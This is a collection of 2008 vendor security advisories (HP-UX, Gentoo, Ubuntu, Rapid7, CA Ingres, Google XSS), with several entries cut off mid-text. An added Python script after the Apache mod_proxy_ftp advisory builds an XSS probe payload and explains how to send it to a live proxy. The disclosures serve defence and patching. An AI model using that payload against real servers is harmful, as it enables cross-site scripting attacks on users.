[security bulletin] HPSBUX02355 SSRT080023 rev.1 - HP-UX Using libc, Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01520421
Version: 1

HPSBUX02355 SSRT080023 rev.1 - HP-UX Using libc, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-08-06
Last Updated: 2008-08-06

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified in HP-UX using libc. This vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2008-1664

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23 and B.11.31 using libc.

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference        Base Vector                    Base Score
  CVE-2008-1664    (AV:N/AC:L/Au:S/C:N/I:P/A:C)   7.5
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION
HP is providing the following software patches to resolve the vulnerability. The patches are available from: http://itrc.hp.com

HP-UX Release - HP-UX B.11.23 (11i v2)
Action - Install PHCO_38273 or subsequent

HP-UX Release - HP-UX B.11.31 (11i v3)
Action - Install PHCO_38048 or subsequent

MANUAL ACTIONS: No

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP Security Bulletin issues and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

The following is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS

HP-UX B.11.23
===================
OS-Core.C-MIN
OS-Core.C-MIN-64ALIB
OS-Core.CORE2-64SLIB
OS-Core.CORE2-SHLIBS
ProgSupport.PROG2-AUX
OS-Core.C-MIN,fr=B.11.23
OS-Core.C-MIN-64ALIB
OS-Core.CORE2-64SLIB
OS-Core.CORE2-SHLIBS
ProgSupport.PROG-AX-64ALIB
ProgSupport.PROG-MIN
ProgSupport.PROG2-AUX
action: install patch PHCO_38273 or subsequent
URL: http://itrc.hp.com

HP-UX B.11.31
===================
OS-Core.CORE-64SLIB
OS-Core.CORE-SHLIBS
OS-Core.C-MIN
OS-Core.C-MIN-64ALIB
OS-Core.CORE2-64SLIB
OS-Core.CORE2-SHLIBS
ProgSupport.PROG2-AUX
OS-Core.C-MIN,fr=B.11.31
OS-Core.C-MIN-64ALIB
ProgSupport.PROG-AX-64ALIB
ProgSupport.PROG-MIN
ProgSupport.PROG2-AUX
action: install patch PHCO_38048 or subsequent
URL: http://itrc.hp.com

END AFFECTED VERSIONS

HISTORY
Version: 1 (rev.1) 6 August 2008 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with cur
[security bulletin] HPSBUX02351 SSRT080058 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01506861
Version: 3

HPSBUX02351 SSRT080058 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-07-16
Last Updated: 2008-08-06

Potential Security Impact: Remote DNS cache poisoning

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running BIND. The vulnerability could be exploited remotely to cause DNS cache poisoning.

References: CVE-2008-1447

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, B.11.31 running BIND v9.3.2 or BIND v9.2.0
HP-UX B.11.11 running BIND v8.1.2

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference        Base Vector                    Base Score
  CVE-2008-1447    (AV:N/AC:L/Au:N/C:P/I:P/A:P)   7.5
===========================================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION
HP has provided the following software updates / patch to resolve the vulnerabilities for BIND v9.2.0 and BIND v9.3.2. Customers running BIND v8.1.2 on HP-UX B.11.11 should upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below.
The BIND v9.2.0 update is available for download from: ftp://ss080058:[EMAIL PROTECTED]
The patch PHNE_37865 is available from: http://itrc.hp.com
The BIND v9.3.2 updates are available for download from: http://software.hp.com

HP-UX Release - B.11.11 running v8.1.2
Action - Upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates listed below

HP-UX Release - B.11.11 running v9.2.0
BIND Depot name - BIND920v11.depot
MD5 Sum - F6999280DE19645EF86FF52083AACD72

HP-UX Release - B.11.23 running v9.2.0
Action - Install PHNE_37865

HP-UX Release - B.11.11 running v9.3.2
Action - Install revision C.9.3.2.3.0 or subsequent

HP-UX Release - B.11.23 running v9.3.2
Action - Install revision C.9.3.2.3.0 or subsequent

HP-UX Release - B.11.31 running v9.3.2
Action - Install revision C.9.3.2.3.0 or subsequent

Note: HP is aware of performance issues with these updates / patch. All customers should test the updates / patch in their environment. HP is investigating changes to reduce the performance issues. This bulletin will be revised when new updates / patch become available.

MANUAL ACTIONS: Yes - NonUpdate
For B.11.11 running v8.1.2, upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates
For B.11.11 running v9.2.0 install BIND920v11.depot

PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically.
For more information see: https://www.hp.com/go/swa

AFFECTED VERSIONS

For BIND v8.1.2
HP-UX B.11.11
===================
InternetSrvcs.INETSVCS-RUN
action: upgrade to BIND v9.2.0 or BIND v9.3.2 and apply the updates

For BIND v9.3.2
HP-UX B.11.11
===================
BindUpgrade.BIND-UPGRADE
action: install revision C.9.3.2.3.0 or subsequent
URL: http://software.hp.com

HP-UX B.11.23
===================
BindUpgrade.BIND-UPGRADE
BindUpgrade.BIND2-UPGRADE
action: install revision C.9.3.2.3.0 or subsequent
URL: http://software.hp.com

HP-UX B.11.31
===================
NameService.BIND-AUX
NameService.BIND-RUN
action: install revision C.9.3.2.3.0 or subsequent
URL: http://software.hp.com

For BIND v9.2.0
HP-UX B.11.11
===================
BINDv920.INETSVCS-BIND
action: install revision B.11.11.01.011 or subsequent
URL: ftp://ss080058:[EMAIL PROTECTED]

HP-UX B.11.23
===================
InternetSrvcs.INETSVCS-INETD
InternetSrvcs.INETSVCS-RUN
InternetSrvcs.INETSVCS2-RUN
action: install patch PHNE_37865 or subsequent
URL: http://itrc.hp.com

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 16 July 2008 Initial release
Version:2 (rev.2) - 19 July 2008 Added BIND v9.2.0 depot information
Version:3 (rev.3) - 06 August 2008 Updated patch location, revised BIND v9.2.0 depot information, added BIND v8.1.2

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message
[ GLSA 200808-06 ] libxslt: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200808-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libxslt: Execution of arbitrary code
      Date: August 06, 2008
      Bugs: #232172
        ID: 200808-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

libxslt is affected by a heap-based buffer overflow, possibly leading to the execution of arbitrary code.

Background
==========

libxslt is the XSLT C library developed for the GNOME project. XSLT is an XML language to define transformations for XML.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-libs/libxslt        < 1.1.24-r1                  >= 1.1.24-r1
                                                              < 1.1.8
    -------------------------------------------------------------------

Description
===========

Chris Evans (Google Security) reported that the libexslt library that is part of libxslt is affected by a heap-based buffer overflow in the RC4 encryption/decryption functions.

Impact
======

A remote attacker could entice a user to process an XML file using a specially crafted XSLT stylesheet in an application linked against libxslt, possibly leading to the execution of arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libxslt users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24-r1"

References
==========

  [ 1 ] CVE-2008-2935
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
[USN-635-1] xine-lib vulnerabilities
===========================================================
Ubuntu Security Notice USN-635-1                 August 06, 2008
xine-lib vulnerabilities
CVE-2008-0073, CVE-2008-0225, CVE-2008-0238, CVE-2008-0486,
CVE-2008-1110, CVE-2008-1161, CVE-2008-1482, CVE-2008-1686,
CVE-2008-1878
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libxine-main1                   1.1.1+ubuntu2-7.9

Ubuntu 7.04:
  libxine-main1                   1.1.4-2ubuntu3.1

Ubuntu 7.10:
  libxine1                        1.1.7-1ubuntu1.3

Ubuntu 8.04 LTS:
  libxine1                        1.1.11.1-1ubuntu3.1

After a standard system upgrade you need to restart applications linked against xine-lib to effect the necessary changes.

Details follow:

Alin Rad Pop discovered an array index vulnerability in the SDP parser. If a user or automated system were tricked into opening a malicious RTSP stream, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0073)

Luigi Auriemma discovered that xine-lib did not properly check buffer sizes in the RTSP header-handling code. If xine-lib opened an RTSP stream with crafted SDP attributes, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0225, CVE-2008-0238)

Damian Frizza and Alfredo Ortega discovered that xine-lib did not properly validate FLAC tags. If a user or automated system were tricked into opening a crafted FLAC file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0486)

It was discovered that the ASF demuxer in xine-lib did not properly check the length of the ASF header. If a user or automated system were tricked into opening a crafted ASF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1110)

It was discovered that the Matroska demuxer in xine-lib did not properly verify frame sizes. If xine-lib opened a crafted Matroska file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1161)

Luigi Auriemma discovered multiple integer overflows in xine-lib. If a user or automated system were tricked into opening a crafted FLV, MOV, RM, MVE, MKV or CAK file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1482)

It was discovered that xine-lib did not properly validate its input when processing Speex file headers. If a user or automated system were tricked into opening a specially crafted Speex file, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program. (CVE-2008-1686)

Guido Landi discovered a stack-based buffer overflow in xine-lib when processing NSF files. If xine-lib opened a specially crafted NSF file with a long NSF title, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program.
(CVE-2008-1878)

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.9.diff.gz
      Size/MD5:    25244 c709cf6894d6425dd46e8f132615573c
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.9.dsc
      Size/MD5:     1113 f70db346860ad8541f3681154e9bf3bc
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz
      Size/MD5:  6099365 5d0f3988e4d95f6af6f3caf2130ee992

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_amd64.deb
      Size/MD5:   116324 84bb0ee2f6090e64162ff2f2a0f020f1
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_amd64.deb
      Size/MD5:  2616066 1a99049356180801943cf96c0263fe28

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_i386.deb
      Size/MD5:   116320 6dc097583c9ad936b94ced44a8616c27
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-main1_1.1.1+ubuntu2-7.9_i386.deb
      Size/MD5:  2935352 acfa8daaf8ea120c1beadc1926eaf08d

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.1+ubuntu2-7.9_powerpc.deb
      Size/MD5:   116334 c35db71e1841640f35b6eb7010baf3d3
    http://security.ubuntu.com/ubuntu/pool/main/x/
[ GLSA 200808-05 ] ISC DHCP: Denial of Service
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200808-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ISC DHCP: Denial of Service
      Date: August 06, 2008
      Bugs: #227135
        ID: 200808-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A Denial of Service vulnerability was discovered in ISC DHCP.

Background
==========

ISC DHCP is ISC's reference implementation of all aspects of the Dynamic Host Configuration Protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/dhcp              < 3.1.1                       >= 3.1.1
    -------------------------------------------------------------------

Description
===========

A buffer overflow error was found in the ISC DHCP server that can only be exploited under unusual server configurations where the DHCP server is configured to provide clients with a large set of DHCP options.

Impact
======

A remote attacker could exploit this vulnerability to cause a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All ISC DHCP users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/dhcp-3.1.1"

References
==========

  [ 1 ] CVE-2007-0062
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting
Rapid7 Advisory R7-0033
Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting

Discovered: July 25, 2008
Published: August 5, 2008
Revision: 1.1
http://www.rapid7.com/advisories/R7-0033
CVE: CVE-2008-2939

1. Affected system(s):

KNOWN VULNERABLE:
 o Apache HTTP Server 2.2.9 (and earlier 2.2.x versions)
 o Apache HTTP Server 2.0.63 (and earlier 2.0.x versions)

NOT VULNERABLE:
 o Apache HTTP Server 1.3.x (because mod_proxy_ftp doesn't support wildcard characters)

2. Summary

The mod_proxy_ftp module of the Apache HTTP Server is vulnerable to a cross-site scripting vulnerability when handling requests with wildcard characters (aka globbing characters).

3. Vendor status and information

Apache HTTP Server Project
http://httpd.apache.org

The developers were notified of this vulnerability on July 28, 2008 via the private security mailing list [EMAIL PROTECTED] They acknowledged it within 12 hours. On July 29, they assigned it a CVE ID. On August 5, the vulnerability was fixed in all SVN branches:

 o Commit to main trunk: http://svn.apache.org/viewvc?view=rev&revision=682868
 o Commit to 2.2 branch:  http://svn.apache.org/viewvc?view=rev&revision=682870
 o Commit to 2.0 branch:  http://svn.apache.org/viewvc?view=rev&revision=682871

4. Solution

Upgrade to Apache HTTP Server 2.2.10 or 2.0.64 (as of August 6, these have not been released yet), or apply the patch from SVN commit r682868.

5. Detailed analysis

When Apache HTTP Server is configured with proxy support ("ProxyRequests On" in the configuration file), and when mod_proxy_ftp is enabled to support FTP-over-HTTP, requests containing wildcard characters (asterisk, tilde, opening square bracket, etc) such as:

    GET ftp://host/* HTTP/1.0

lead to cross-site scripting in the response returned by mod_proxy_ftp:

    [...]
    Directory of ftp://host/*
    [...]

To exploit this vulnerability, 'host' must be running an FTP server, and the last directory component of the path (the XSS payload) must be composed of at least 1 wildcard character and must not contain any forward slashes. In practice, this last requirement is not an obstacle at all to developing working exploits, example:

    ftp://host/*

6. Credit

Discovered by Marc Bevand of Rapid7.

7. Contact Information

Rapid7, LLC
Email: [EMAIL PROTECTED]
Web: http://www.rapid7.com
Phone: +1 (617) 247-1717

8. Disclaimer and Copyright

Rapid7, LLC is not responsible for the misuse of the information provided in our security advisories. These advisories are a service to the professional security community. There are NO WARRANTIES with regard to this information. Any application or distribution of this information constitutes acceptance AS IS, at the user's own risk. This information is subject to change without notice.

This advisory Copyright (C) 2008 Rapid7, LLC. Permission is hereby granted to redistribute this advisory, providing that no changes are made and that the copyright notices and disclaimers remain intact.
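The request/response pattern in section 5 and the exploit conditions above, as an added example that is not part of the Rapid7 advisory or of Apache's code. The Python helper below checks a candidate last path component against the two conditions the advisory states (at least one wildcard character, no forward slash), builds the HTTP/1.0 absolute-URI probe that a forward proxy with "ProxyRequests On" would hand to mod_proxy_ftp, and classifies a captured response body as reflecting the payload raw, escaped, or not at all. The two listing_heading_* functions only model the pre-fix and post-fix output as the advisory describes it, not Apache's implementation; the GLOB_CHARS set (the three characters the advisory names) and the "<img ...>" payload are my assumptions. Note that the "no forward slash" rule rules out a closing </script> tag, which is why the sample payload uses an event handler instead:

```python
import html

# Wildcard ("globbing") characters the advisory names explicitly. The
# advisory says "etc", so this set is an assumption and may need extending.
GLOB_CHARS = frozenset("*~[")


def is_globbing_component(path):
    """Advisory exploit conditions: the last path component must contain
    at least one wildcard character and no forward slash. Taking the text
    after the last '/' enforces the second condition by construction."""
    last = path.rsplit("/", 1)[-1]
    return bool(last) and any(c in GLOB_CHARS for c in last)


def build_probe(host, payload):
    """Raw HTTP/1.0 absolute-URI request that a forward proxy with
    "ProxyRequests On" hands to mod_proxy_ftp. The payload is used
    verbatim so the wildcard and any markup survive into the request line."""
    if not is_globbing_component(payload):
        raise ValueError("payload would not reach the globbing code path")
    return (f"GET ftp://{host}/{payload} HTTP/1.0\r\n"
            f"Host: {host}\r\n\r\n").encode("latin-1")


def listing_heading_vulnerable(url):
    """Pre-fix behaviour as the advisory describes it: the requested URL is
    echoed verbatim into the directory listing (a model, not Apache's code)."""
    return f"<h2>Directory of {url}</h2>"


def listing_heading_fixed(url):
    """Post-fix behaviour: the URL is HTML-escaped before it is written into
    the page (a model of the r682868 change, not the commit itself)."""
    return f"<h2>Directory of {html.escape(url, quote=True)}</h2>"


def classify(body, payload):
    """Classify a captured proxy response body for a probe that carried
    `payload` as its last path component."""
    escaped = html.escape(payload, quote=True)
    if escaped == payload:
        # Nothing HTML-significant in the payload (e.g. a bare "*"), so
        # seeing it reflected proves nothing either way.
        return "inconclusive"
    if payload in body:
        return "vulnerable"        # reflected raw: markup reaches the browser
    if escaped in body:
        return "escaped"           # reflected, but neutralised
    return "not-reflected"


if __name__ == "__main__":
    # Constructed payload: a wildcard plus markup that needs no '/'.
    payload = "*<img src=x onerror=alert(1)>"
    url = "ftp://host/" + payload
    print(build_probe("host", payload).decode("latin-1"))
    print(classify(listing_heading_vulnerable(url), payload))   # vulnerable
    print(classify(listing_heading_fixed(url), payload))        # escaped
```

To use it against a real proxy, send the bytes from build_probe to the proxy port with a plain socket, read the response, and feed the body to classify together with the same payload; a "vulnerable" verdict means the wildcard path is being echoed into the listing unescaped.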
Google Notebook and Google Bookmarks Cross Site Scripting Vulnerabilities
I. Background:

Google Notebook is a service where it's possible to "add text, images, and links from web pages without leaving your browser window." Google Bookmarks is a service where it's possible to save bookmarks.

II. Description:

Three cross site scripting vulnerabilities were identified inside Google Notebook. A remote attacker can create a malformed notebook and, through the sharing option inside Google Notebook, invite other users to view it in order to obtain their cookie. User interaction is required to exploit all three vulnerabilities.

Browser affected: Firefox 3.
Browsers not affected: Internet Explorer 7, Opera 9.5, Safari 3.

One cross site scripting vulnerability was identified inside Google Bookmarks. A remote attacker can create a malformed bookmark inside his account and then share it with other users to obtain their cookie. User interaction is required to exploit this vulnerability.

Browsers affected: Mozilla Firefox 3, Internet Explorer 7, Opera 9.5, Safari 3.

III. Vendor Response:

Google acknowledged the 4 vulnerabilities and has deployed a fix for them.

IV. Disclosure timeline:

23/07/08 - First vulnerability discovered
23/07/08 - Google informed
24/07/08 - Google confirmed first bug
31/07/08 - Google fixed the first vulnerability
31/07/08 - Three new vulnerabilities discovered
31/07/08 - Google informed
31/07/08 - Google confirmed these three new bugs
01/08/08 - Google fixed all vulnerabilities submitted

Regards
Alfredo Melloni
CA Products That Embed Ingres Multiple Vulnerabilities
Title: CA Products That Embed Ingres Multiple Vulnerabilities

CA Advisory Date: 2008-08-01

Reported By: iDefense Labs

Impact: A remote attacker can execute arbitrary code, gain privileges, or cause a denial of service condition.

Summary: CA products that embed Ingres contain multiple vulnerabilities that can allow a remote attacker to execute arbitrary code, gain privileges, or cause a denial of service condition. These vulnerabilities exist in the products and on the platforms listed below. These vulnerabilities do not impact any Windows-based Ingres installation.

The first vulnerability, CVE-2008-3356, allows an unauthenticated attacker to set the user and/or group ownership of a verifydb log file to ingres, giving read/write permission to both.

The second vulnerability, CVE-2008-3357, is an insecure directory permission problem involving the ingvalidpw utility; chained with the third vulnerability it allows root privileges to be obtained.

The third vulnerability, CVE-2008-3389, is a buffer overflow (pointer overwrite) in verifydb, iimerge and csreport that allows an unauthenticated attacker to execute arbitrary code within the context of the database server process and so obtain ingres user privileges.

Mitigating Factors: These vulnerabilities do not impact any Windows-based Ingres installation.

Severity: CA has given these vulnerabilities a High risk rating.
Affected Products:

  Admin r8.1 SP2
  Advantage Data Transformer r2.2
  Allfusion Harvest Change Manager r7.1
  CA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3
  CA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3
  CA Directory r8.1
  CA Job Management Option R11.0
  CA Single Sign-On r8.1
  CleverPath Aion BPM r10.1, r10.2
  EEM 8.1, 8.2, 8.2.1
  eTrust Audit/SCC 8.0 sp2
  Identity Manager r12
  NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11
  Unicenter Asset Management r11.1, r11.2
  Unicenter Remote Control r11.2
  Unicenter Service Catalog r2.2, r11.1
  Unicenter Service Metric Analysis r11.1
  Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2
  Unicenter Software Delivery r11.1, r11.2
  Unicenter Workload Control Center r11

Affected Platforms:

  1. Ingres verifydb file create permission override (CVE-2008-3356)
     This vulnerability impacts all platforms except Windows.
  2. Ingres un-secure directory privileges with utility ingvalidpw (CVE-2008-3357)
     This vulnerability impacts only Linux and HP platforms.
  3. Ingres verifydb, iimerge, csreport buffer overflow (CVE-2008-3389)
     This vulnerability impacts only Linux and HP platforms.

Status and Recommendation:

The most prudent course of action for affected customers is to download and apply the corrective maintenance. However, updates are provided only for the following releases: 2.6 and r3

Important: Customers using products that embed an earlier version of Ingres r3 should upgrade Ingres to the release that is currently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX platforms) before applying the maintenance updates. Please contact your product's Technical Support team for more information.

For these products:

  Admin r8.1 SP2
  CA ARCserve Backup for Linux r11.5 SP2/SP3
  CA Directory r8.1
  CA Job Management Option R11.0
  CA Single Sign-On r8.1
  EEM 8.2
  EEM 8.2.1
  Identity Manager r12
  NSM r11
  Unicenter Asset Management r11.1
  Unicenter Asset Management r11.2
  Unicenter Remote Control r11.2
  Unicenter Service Catalog r11.1
  Unicenter Service Metric Analysis r11.1
  Unicenter ServicePlus Service Desk r11
  Unicenter ServicePlus Service Desk r11.1
  Unicenter ServicePlus Service Desk r11.2
  Unicenter Software Delivery r11.1
  Unicenter Software Delivery r11.2
  Unicenter Workload Control Center r11

Apply the update below that is listed for your platform (note that URLs may wrap):

  AIX [3.0.3 (r64.us5/211)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z

  HP-UX Itanium [3.0.3 (i64.hpu/211)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z

  HP-UX RISC [3.0.3 (hp2.us5/211)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z

  Linux AMD [3.0.3 (a64.lnx/211)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z

  Linux Intel 32bit [3.0.3 (int.lnx/103)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z

  Linux Itanium [3.0.3 (i64.lnx/211)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z

  Solaris SPARC [3.0.3 (su9.us5/211)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z

  Solaris x64/x86 [3.0.3 (a64.sol/211)]
  ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z

Ingres r3 Vulnerability Updates Install Steps (August 1, 2008)

Unix/Linux:

  1. Log on to your system using the installation owner account and make sure the environmen
Interesting things at sec-consult.com, DNS-whitepaper available tomorrow
Hello,

We recently decided to release some of our research to the public, so selected presentations from our internal tech meetings will from now on be available for download at the SEC Consult website. The presentations (some of which are in German) will include everything from general howtos to highly specialized pentesting stuff.

We will also release a whitepaper on a variant of the new DNS poisoning attack tomorrow. We wrote this whitepaper along with an exploit a while ago, and somehow managed NOT to leak it to the press before the Kaminsky talk :)

The presentations and whitepapers, along with our past presentations from Blackhat and Deepsec, can be found at:
http://www.sec-consult.com/publikationen_e.html

Here are some links to what is already online:

* A German guide to WEP/WPA cracking, by Johannes Greil:
  http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf

* A presentation on the method of using DLL injection to interface to an SSL connection used by a running process (I used this for blackbox-testing certain binary SSL client/server applications):
  http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf

* A short presentation on a method of error-based SQL injection in Sybase databases, by Thomas Kerbl:
  http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf

I hope that some of you will find this useful.

Regards,
Bernhard (Certified Internet Security Superstar)

--
Bernhard Mueller
Security Consultant
